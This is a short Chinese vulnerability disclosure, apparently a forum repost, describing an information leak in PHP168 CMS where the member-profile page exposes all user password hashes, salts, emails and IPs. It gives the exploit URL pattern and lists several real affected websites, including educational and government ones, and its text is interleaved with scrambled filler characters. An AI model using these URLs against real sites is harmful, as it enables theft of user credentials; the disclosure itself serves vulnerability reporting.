|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
3 G @: G; f+ }& u! t* K
( B/ G* D8 \: f0 P以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
& X: k! Z* w, a+ L/ K, A
' W/ ]/ N( T3 Z8 V6 N) ohttp://php168.cn/com/homepage.php/admin/member-profile
7 E2 W! _2 F7 ^
3 c" ]- e! r+ c: S5 I3 Y7 M( S1 L, y由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
2 u6 u4 U3 L' c; z+ Qhttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg$ z' z% U# v+ p# ?+ Z. l
! M3 ]( M' ?0 ~
漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:/ @8 B& C% n, Z4 L
* }; s# R& u$ h' D+ p. a& I0 Q5 c1 {http://www.zjfzol.com.cn/homepage.php/admin/member-profile& X# G# a, e; ]: B
" W1 h% L0 Y% O5 K: S$ f2 H
http://www.scswl.cn/homepage.php/admin/member-profile
, V) ~( C- p3 H* `& S; r! Y- ?; u+ F1 D& x8 \; N
http://www.tunet.edu.cn/homepage.php/admin/member-profile
" D7 [% K. H9 P4 S A, Z' l9 q
1 R; t& k& g# v/ F! Whttp://www.itlead.com.cn/homepage.php/admin/member-profile6 F1 l" i# E% ^# {9 T
- L& {* V& F4 J( g, N5 B
http://www.aedp.cn/homepage.php/admin/member-profile
* ?- s1 v, ? j% m( X/ Q/ p
1 t' P Q6 c$ C3 V/ ^' lhttp://www.qianlongnews.com/homepage.php/test/member-profile# ~3 X9 e' O" q7 T; w
0 Z2 S B! W5 S& q! O l: L" uhttp://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
# D+ N3 j9 ^& _$ m7 D) q[/table] |